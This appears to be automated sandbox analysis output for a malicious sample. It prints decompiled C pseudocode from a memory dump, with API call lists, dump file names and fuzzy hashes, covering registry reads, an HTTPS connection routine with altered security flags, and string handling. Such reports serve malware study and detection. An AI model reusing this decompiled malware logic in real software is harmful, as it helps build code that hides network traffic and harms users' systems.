                                                                                                            • Instruction ID: eba130b8e38020e78d32e9a38fe9cfb82dfc47eab4b0525136b1f4dac6cfa0d8
                                                                                                            • Opcode Fuzzy Hash: 84e0de005c89fb0f0dff290d292710fa7ee8224fbd704a9e99a7fd5bcb13939c
                                                                                                            • Instruction Fuzzy Hash: D33107B5901208FFDB14EFA5C980AAEB7FCFF49204F144969E542E7250D6309A55DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0303502E(void* __edx) {
                                                                                                            				void* _v8;
                                                                                                            				int _v12;
                                                                                                            				WCHAR* _v16;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* _t23;
                                                                                                            				intOrPtr _t24;
                                                                                                            				void* _t26;
                                                                                                            				intOrPtr _t32;
                                                                                                            				intOrPtr _t35;
                                                                                                            				intOrPtr _t38;
                                                                                                            				void* _t40;
                                                                                                            				intOrPtr _t42;
                                                                                                            				void* _t45;
                                                                                                            				void* _t50;
                                                                                                            				void* _t52;
                                                                                                            
                                                                                                            				_t50 = __edx;
                                                                                                            				_v12 = 0;
                                                                                                            				_t23 = E030337AC(0,  &_v8); // executed
                                                                                                            				if(_t23 != 0) {
                                                                                                            					_v8 = 0;
                                                                                                            				}
                                                                                                            				_t24 =  *0x303d2e0; // 0x22da5a8
                                                                                                            				_t4 = _t24 + 0x303edc8; // 0x5319370
                                                                                                            				_t5 = _t24 + 0x303ed70; // 0x4f0053
                                                                                                            				_t26 = E03034B28( &_v16, _v8, _t5, _t4); // executed
                                                                                                            				_t45 = _t26;
                                                                                                            				if(_t45 == 0) {
                                                                                                            					StrToIntExW(_v16, 0,  &_v12);
                                                                                                            					_t45 = 8;
                                                                                                            					if(_v12 < _t45) {
                                                                                                            						_t45 = 1;
                                                                                                            						__eflags = 1;
                                                                                                            					} else {
                                                                                                            						_t32 =  *0x303d2e0; // 0x22da5a8
                                                                                                            						_t11 = _t32 + 0x303edbc; // 0x5319364
                                                                                                            						_t48 = _t11;
                                                                                                            						_t12 = _t32 + 0x303ed70; // 0x4f0053
                                                                                                            						_t52 = E0303131E(_t11, _t12, _t11);
                                                                                                            						_t59 = _t52;
                                                                                                            						if(_t52 != 0) {
                                                                                                            							_t35 =  *0x303d2e0; // 0x22da5a8
                                                                                                            							_t13 = _t35 + 0x303ee06; // 0x30314549
                                                                                                            							if(E0303117A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                                                                                            								_t61 =  *0x303d294 - 6;
                                                                                                            								if( *0x303d294 <= 6) {
                                                                                                            									_t42 =  *0x303d2e0; // 0x22da5a8
                                                                                                            									_t15 = _t42 + 0x303ec12; // 0x52384549
                                                                                                            									E0303117A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_t38 =  *0x303d2e0; // 0x22da5a8
                                                                                                            							_t17 = _t38 + 0x303ee00; // 0x53193a8
                                                                                                            							_t18 = _t38 + 0x303edd8; // 0x680043
                                                                                                            							_t40 = E03035DDA(_v8, 0x80000001, _t52, _t18, _t17); // executed
                                                                                                            							_t45 = _t40;
                                                                                                            							HeapFree( *0x303d270, 0, _t52);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					HeapFree( *0x303d270, 0, _v16);
                                                                                                            				}
                                                                                                            				_t54 = _v8;
                                                                                                            				if(_v8 != 0) {
                                                                                                            					E030351BB(_t54);
                                                                                                            				}
                                                                                                            				return _t45;
                                                                                                            			}




















                                                                                                            APIs
                                                                                                            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05319370,00000000,?,747DF710,00000000,747DF730), ref: 0303507D
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,053193A8,?,00000000,30314549,00000014,004F0053,05319364), ref: 0303511A
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,030354EF), ref: 0303512C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 3298025750-1536154274
                                                                                                            • Opcode ID: 6e9066e1579a292086d07011cdee67c8fe749514aaa89ca8135c89f574d1b560
                                                                                                            • Instruction ID: 20fbbd452ac9a918cf6afc23536d17e64604503e4079afcea76af48b06021c9c
                                                                                                            • Opcode Fuzzy Hash: 6e9066e1579a292086d07011cdee67c8fe749514aaa89ca8135c89f574d1b560
                                                                                                            • Instruction Fuzzy Hash: B831B676503108BFDB21EB94DD84FEE7BBCFB5A700F190265E5009B160D7719A15DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,6F0DC338,000008BB), ref: 6F04D345
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName
                                                                                                            • String ID: 1$N
                                                                                                            • API String ID: 514040917-3127171972
                                                                                                            • Opcode ID: 8fd51f56f40f147cd04247e15d4ff0eeeac1c356db84feff344070ed4a42ac0e
                                                                                                            • Instruction ID: 145c3df08cd0ec8d591a1cf2ed114b003f68e25b2a4aeac651a5d9991316f75b
                                                                                                            • Opcode Fuzzy Hash: 8fd51f56f40f147cd04247e15d4ff0eeeac1c356db84feff344070ed4a42ac0e
                                                                                                            • Instruction Fuzzy Hash: C4035E71904952CECB08CF69CE907787FF2FB57325B24816ADD458728BE33955A8EB08
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • SysAllocString.OLEAUT32(80000002), ref: 03033DFD
                                                                                                            • SysAllocString.OLEAUT32(030328D9), ref: 03033E41
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03033E55
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03033E63
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 344208780-0
                                                                                                            • Opcode ID: f3e17f63cfd329979f9691884c8d3903b40b945714a5e9a85d2354baa0ac5554
                                                                                                            • Instruction ID: 78134ff6954150a1c9fd8a8d5d584d8634b4aa2d84af6dc6a56b3cb304d1bb44
                                                                                                            • Opcode Fuzzy Hash: f3e17f63cfd329979f9691884c8d3903b40b945714a5e9a85d2354baa0ac5554
                                                                                                            • Instruction Fuzzy Hash: F8314C76902209EFCB00DF98D8C49EEBBB9FF59300B10846EF50697250D7349A41CF65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 23%
                                                                                                            			E03037749(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v12;
                                                                                                            				void* _t34;
                                                                                                            				long _t36;
                                                                                                            				unsigned int _t37;
                                                                                                            				void* _t38;
                                                                                                            				intOrPtr _t39;
                                                                                                            				void* _t40;
                                                                                                            				intOrPtr _t42;
                                                                                                            				intOrPtr _t43;
                                                                                                            				intOrPtr _t45;
                                                                                                            				void* _t56;
                                                                                                            				intOrPtr _t57;
                                                                                                            				void* _t63;
                                                                                                            				intOrPtr* _t65;
                                                                                                            				intOrPtr* _t66;
                                                                                                            				void* _t69;
                                                                                                            
                                                                                                            				_t66 = __esi;
                                                                                                            				_t63 = E03031922(_t34, _a4);
                                                                                                            				if(_t63 == 0) {
                                                                                                            					L18:
                                                                                                            					_t36 = GetLastError();
                                                                                                            				} else {
                                                                                                            					_t37 = GetVersion();
                                                                                                            					_t69 = _t37 - 6;
                                                                                                            					if(_t69 > 0) {
                                                                                                            						L5:
                                                                                                            						_a4 = 4;
                                                                                                            					} else {
                                                                                                            						if(_t69 != 0) {
                                                                                                            							L4:
                                                                                                            							_a4 = 0;
                                                                                                            						} else {
                                                                                                            							_t37 = _t37 >> 8;
                                                                                                            							if(_t37 > 2) {
                                                                                                            								goto L5;
                                                                                                            							} else {
                                                                                                            								goto L4;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					__imp__(_t63, _a4, 0, 0, 0); // executed
                                                                                                            					 *(_t66 + 0x10) = _t37;
                                                                                                            					_t38 = E03034AAB(_t63);
                                                                                                            					if( *(_t66 + 0x10) == 0) {
                                                                                                            						goto L18;
                                                                                                            					} else {
                                                                                                            						_t39 = E03031922(_t38,  *_t66);
                                                                                                            						_v8 = _t39;
                                                                                                            						if(_t39 == 0) {
                                                                                                            							goto L18;
                                                                                                            						} else {
                                                                                                            							_t65 = __imp__; // 0x6ee0f5a0
                                                                                                            							if(_a8 == 0) {
                                                                                                            								L10:
                                                                                                            								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
                                                                                                            								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
                                                                                                            								_t40 = E03034AAB(_v8);
                                                                                                            								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
                                                                                                            									goto L18;
                                                                                                            								} else {
                                                                                                            									_a4 = 0x800100;
                                                                                                            									_t56 = E03031922(_t40,  *((intOrPtr*)(_t66 + 4)));
                                                                                                            									if(_t56 == 0) {
                                                                                                            										goto L18;
                                                                                                            									} else {
                                                                                                            										_t42 =  *0x303d2e0; // 0x22da5a8
                                                                                                            										_t19 = _t42 + 0x303e758; // 0x450047
                                                                                                            										_t43 = _t19;
                                                                                                            										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
                                                                                                            										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
                                                                                                            										E03034AAB(_t56);
                                                                                                            										_t45 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                            										if(_t45 == 0) {
                                                                                                            											goto L18;
                                                                                                            										} else {
                                                                                                            											_t57 = 4;
                                                                                                            											_v12 = _t57;
                                                                                                            											__imp__(_t45, 0x1f,  &_a4,  &_v12);
                                                                                                            											if(_t45 != 0) {
                                                                                                            												_a4 = _a4 | 0x00000100;
                                                                                                            												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
                                                                                                            											}
                                                                                                            											_push(_t57);
                                                                                                            											_push( &_a8);
                                                                                                            											_push(6);
                                                                                                            											_push( *((intOrPtr*)(_t66 + 0x18)));
                                                                                                            											if( *_t65() == 0) {
                                                                                                            												goto L18;
                                                                                                            											} else {
                                                                                                            												_push(_t57);
                                                                                                            												_push( &_a8);
                                                                                                            												_push(5);
                                                                                                            												_push( *((intOrPtr*)(_t66 + 0x18)));
                                                                                                            												if( *_t65() == 0) {
                                                                                                            													goto L18;
                                                                                                            												} else {
                                                                                                            													_t36 = 0;
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
                                                                                                            								if(_t39 == 0) {
                                                                                                            									goto L18;
                                                                                                            								} else {
                                                                                                            									goto L10;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t36;
                                                                                                            			}





















                                                                                                            APIs
                                                                                                              • Part of subcall function 03031922: lstrlen.KERNEL32(?,00000000,05319B38,00000000,030374FF,05319D16,?,?,?,?,?,69B25F44,00000005,0303D00C), ref: 03031929
                                                                                                              • Part of subcall function 03031922: mbstowcs.NTDLL ref: 03031952
                                                                                                              • Part of subcall function 03031922: memset.NTDLL ref: 03031964
                                                                                                            • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,0303544C,00000000,00000000,05319618,?,?,03032A8A,?,05319618,0000EA60), ref: 03037764
                                                                                                            • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,0303544C,00000000,00000000,05319618,?,?,03032A8A,?,05319618,0000EA60), ref: 0303788F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                                                                            • String ID: @MxtNxt
                                                                                                            • API String ID: 4097109750-1701360479
                                                                                                            • Opcode ID: 65c31a2f4c71bf636c6c631cf4d3865e0ac14f7b5fe6e0e4a4086f41f19ca153
                                                                                                            • Instruction ID: bbe0d65b5760c6335f847b0cb095732b95ef0853776cae9d9ef56d3bd8fd9eb0
                                                                                                            • Opcode Fuzzy Hash: 65c31a2f4c71bf636c6c631cf4d3865e0ac14f7b5fe6e0e4a4086f41f19ca153
                                                                                                            • Instruction Fuzzy Hash: 5E415EB6101208FFEB35EFA4CC85EAA7BFDEB49B40F044529F64299050E771DA45CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 47%
                                                                                                            			E03035141(char* _a4, char** _a8) {
                                                                                                            				char* _t7;
                                                                                                            				char* _t11;
                                                                                                            				char* _t14;
                                                                                                            				char* _t16;
                                                                                                            				char* _t17;
                                                                                                            				char _t18;
                                                                                                            				signed int _t20;
                                                                                                            				signed int _t22;
                                                                                                            
                                                                                                            				_t16 = _a4;
                                                                                                            				_push(0x20);
                                                                                                            				_t20 = 1;
                                                                                                            				_push(_t16);
                                                                                                            				while(1) {
                                                                                                            					_t7 = StrChrA();
                                                                                                            					if(_t7 == 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					_t20 = _t20 + 1;
                                                                                                            					_push(0x20);
                                                                                                            					_push( &(_t7[1]));
                                                                                                            				}
                                                                                                            				_t11 = E030375F6(_t20 << 2);
                                                                                                            				_a4 = _t11;
                                                                                                            				if(_t11 != 0) {
                                                                                                            					StrTrimA(_t16, 0x303c2a4); // executed
                                                                                                            					_t22 = 0;
                                                                                                            					do {
                                                                                                            						_t14 = StrChrA(_t16, 0x20);
                                                                                                            						if(_t14 != 0) {
                                                                                                            							 *_t14 = 0;
                                                                                                            							do {
                                                                                                            								_t14 =  &(_t14[1]);
                                                                                                            								_t18 =  *_t14;
                                                                                                            							} while (_t18 == 0x20 || _t18 == 9);
                                                                                                            						}
                                                                                                            						_t17 = _a4;
                                                                                                            						 *(_t17 + _t22 * 4) = _t16;
                                                                                                            						_t22 = _t22 + 1;
                                                                                                            						_t16 = _t14;
                                                                                                            					} while (_t14 != 0);
                                                                                                            					 *_a8 = _t17;
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • StrChrA.SHLWAPI(?,00000020,00000000,053195AC,03035390,?,0303935C,?,053195AC,?,03035390), ref: 0303515D
                                                                                                            • StrTrimA.SHLWAPI(?,0303C2A4,00000002,?,0303935C,?,053195AC,?,03035390), ref: 0303517B
                                                                                                            • StrChrA.SHLWAPI(?,00000020,?,0303935C,?,053195AC,?,03035390), ref: 03035186
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Trim
                                                                                                            • String ID:
                                                                                                            • API String ID: 3043112668-0
                                                                                                            • Opcode ID: 68da7e6125aa707d18c6be83a9d9caf656d9edfe137342ea0d75cfd6d14717b7
                                                                                                            • Instruction ID: c87b0166ae270a56e0c281c66b2f8f8fdce1fb6e414e47cf30a3af2dddcfcbbe
                                                                                                            • Opcode Fuzzy Hash: 68da7e6125aa707d18c6be83a9d9caf656d9edfe137342ea0d75cfd6d14717b7
                                                                                                            • Instruction Fuzzy Hash: 2B017C717063466FE7609A6E8C44F6BBBDDEFC7640F185011FA55CB2A2EA70D84286A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 32%
                                                                                                            			E03031F72(intOrPtr _a4, signed int _a8) {
                                                                                                            				long _v8;
                                                                                                            				long _v12;
                                                                                                            				char _v16;
                                                                                                            				void* _t14;
                                                                                                            				long _t15;
                                                                                                            				char* _t17;
                                                                                                            				intOrPtr* _t19;
                                                                                                            				signed int _t22;
                                                                                                            
                                                                                                            				_t19 = __imp__; // 0x6ee0e700
                                                                                                            				_t22 =  ~_a8;
                                                                                                            				_v12 = 0;
                                                                                                            				asm("sbb esi, esi");
                                                                                                            				while(1) {
                                                                                                            					_v8 = 0;
                                                                                                            					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
                                                                                                            					if(_t14 != 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					_t15 = GetLastError();
                                                                                                            					_v8 = _t15;
                                                                                                            					if(_t15 != 0x2f8f) {
                                                                                                            						if(_t15 == 0x2f00) {
                                                                                                            							continue;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_v16 = 0x3300;
                                                                                                            						if(_v12 == 0) {
                                                                                                            							_t17 =  &_v16;
                                                                                                            							__imp__(_a4, 0x1f, _t17, 4);
                                                                                                            							if(_t17 == 0) {
                                                                                                            								_v8 = GetLastError();
                                                                                                            							} else {
                                                                                                            								_v12 = 1;
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L9:
                                                                                                            					return _v8;
                                                                                                            				}
                                                                                                            				goto L9;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32 ref: 03031F8F
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,030346B9,00000000,?,?), ref: 03031FE6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast
                                                                                                            • String ID: @MxtNxt
                                                                                                            • API String ID: 1452528299-1701360479
                                                                                                            • Opcode ID: 6af77312e4f84f01576d26f86f7c0483f9a91161b0fcaceb6f2afc19aa7cd263
                                                                                                            • Instruction ID: b7a4a169d80df35aad22ea27857a2d8ae169f1c154af579e69b796ff5c1b895a
                                                                                                            • Opcode Fuzzy Hash: 6af77312e4f84f01576d26f86f7c0483f9a91161b0fcaceb6f2afc19aa7cd263
                                                                                                            • Instruction Fuzzy Hash: AC015231906208FFDF14EFA6D848DAEBFBCEB8A750F108466E501E2255D7748644DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E03034AAB(void* _a4) {
                                                                                                            				char _t2;
                                                                                                            
                                                                                                            				_t2 = RtlFreeHeap( *0x303d270, 0, _a4); // executed
                                                                                                            				return _t2;
                                                                                                            			}





                                                                                                            APIs
                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,03035012,00000000,?,?,00000000), ref: 03034AB7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 3298025750-1536154274
                                                                                                            • Opcode ID: 2f60205bf70e711e9d8d3b0556355d17fb76a6b03db57200607de355dc50cc1e
                                                                                                            • Instruction ID: d392154089460230fc00ef9000aa9f172a3bbcdd352611c335bba0c261e1a7b9
                                                                                                            • Opcode Fuzzy Hash: 2f60205bf70e711e9d8d3b0556355d17fb76a6b03db57200607de355dc50cc1e
                                                                                                            • Instruction Fuzzy Hash: A3B012B5105100ABDE21AB50DF04F05BA35B760700F004011B30450078C2358430FB15
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 75%
                                                                                                            			E0303144D(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                            				void* _v8;
                                                                                                            				void* __esi;
                                                                                                            				intOrPtr* _t35;
                                                                                                            				void* _t40;
                                                                                                            				intOrPtr* _t41;
                                                                                                            				intOrPtr* _t43;
                                                                                                            				intOrPtr* _t45;
                                                                                                            				intOrPtr* _t50;
                                                                                                            				intOrPtr* _t52;
                                                                                                            				void* _t54;
                                                                                                            				intOrPtr* _t55;
                                                                                                            				intOrPtr* _t57;
                                                                                                            				intOrPtr* _t61;
                                                                                                            				intOrPtr* _t65;
                                                                                                            				intOrPtr _t68;
                                                                                                            				void* _t72;
                                                                                                            				void* _t75;
                                                                                                            				void* _t76;
                                                                                                            
                                                                                                            				_t55 = _a4;
                                                                                                            				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                            				_a4 = 0;
                                                                                                            				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                            				if(_t76 < 0) {
                                                                                                            					L18:
                                                                                                            					return _t76;
                                                                                                            				}
                                                                                                            				_t40 = E03033DA0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                            				_t76 = _t40;
                                                                                                            				if(_t76 >= 0) {
                                                                                                            					_t61 = _a28;
                                                                                                            					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                            						_t52 = _v8;
                                                                                                            						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                            					}
                                                                                                            					if(_t76 >= 0) {
                                                                                                            						_t43 =  *_t55;
                                                                                                            						_t68 =  *0x303d2e0; // 0x22da5a8
                                                                                                            						_t20 = _t68 + 0x303e1fc; // 0x740053
                                                                                                            						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                            						if(_t76 >= 0) {
                                                                                                            							_t76 = E030347EB(_a4);
                                                                                                            							if(_t76 >= 0) {
                                                                                                            								_t65 = _a28;
                                                                                                            								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                            									_t50 = _a4;
                                                                                                            									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t45 = _a4;
                                                                                                            						if(_t45 != 0) {
                                                                                                            							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                            						}
                                                                                                            						_t57 = __imp__#6;
                                                                                                            						if(_a20 != 0) {
                                                                                                            							 *_t57(_a20);
                                                                                                            						}
                                                                                                            						if(_a12 != 0) {
                                                                                                            							 *_t57(_a12);
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t41 = _v8;
                                                                                                            				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                            				goto L18;
                                                                                                            			}






















                                                                                                            APIs
                                                                                                              • Part of subcall function 03033DA0: SysAllocString.OLEAUT32(80000002), ref: 03033DFD
                                                                                                              • Part of subcall function 03033DA0: SysFreeString.OLEAUT32(00000000), ref: 03033E63
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0303152C
                                                                                                            • SysFreeString.OLEAUT32(030328D9), ref: 03031536
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: String$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 986138563-0
                                                                                                            • Opcode ID: a4509389748c38fef016383d993a72a1eff5eb4812d68f3d27246f311ee1afe5
                                                                                                            • Instruction ID: 51496395257599de01cac45477f6b8091f066d6394a9e6ad7fb80179ae9d2d27
                                                                                                            • Opcode Fuzzy Hash: a4509389748c38fef016383d993a72a1eff5eb4812d68f3d27246f311ee1afe5
                                                                                                            • Instruction Fuzzy Hash: 7C310776501119EFCB15EF69C888C9BBBBDFFCA7407144698F8169B210E631DD51CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E03034B28(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                                                                                                            				void* _t21;
                                                                                                            				void* _t22;
                                                                                                            				signed int _t24;
                                                                                                            				intOrPtr* _t26;
                                                                                                            				void* _t27;
                                                                                                            
                                                                                                            				_t26 = __edi;
                                                                                                            				if(_a4 == 0) {
                                                                                                            					L2:
                                                                                                            					_t27 = E030363F5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                                                                                            					if(_t27 == 0) {
                                                                                                            						_t24 = _a12 >> 1;
                                                                                                            						if(_t24 == 0) {
                                                                                                            							_t27 = 2;
                                                                                                            							HeapFree( *0x303d270, 0, _a4);
                                                                                                            						} else {
                                                                                                            							_t21 = _a4;
                                                                                                            							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                                                                                            							 *_t26 = _t21;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L6:
                                                                                                            					return _t27;
                                                                                                            				}
                                                                                                            				_t22 = E03031E47(_a4, _a8, _a12, __edi); // executed
                                                                                                            				_t27 = _t22;
                                                                                                            				if(_t27 == 0) {
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            				goto L2;
                                                                                                            			}








                                                                                                            APIs
                                                                                                              • Part of subcall function 03031E47: SysFreeString.OLEAUT32(00000000), ref: 03031EAA
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,747DF710,?,00000000,?,00000000,?,0303506B,?,004F0053,05319370,00000000,?), ref: 03034B8B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Free$HeapString
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 3806048269-1536154274
                                                                                                            • Opcode ID: 4e321e3110935a3ba88ac20f76ac5cc1e13d996a9d48f3c9eb75b5443ad59b0f
                                                                                                            • Instruction ID: 206089b2445ad122bbf2f3ad75636dc1e9c1a03e9c80828b815397fc6c1a3153
                                                                                                            • Opcode Fuzzy Hash: 4e321e3110935a3ba88ac20f76ac5cc1e13d996a9d48f3c9eb75b5443ad59b0f
                                                                                                            • Instruction Fuzzy Hash: 4F012832502619BBDB22DE55CC01FEA7BA9EF49790F088024FE089E120D731C920EB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
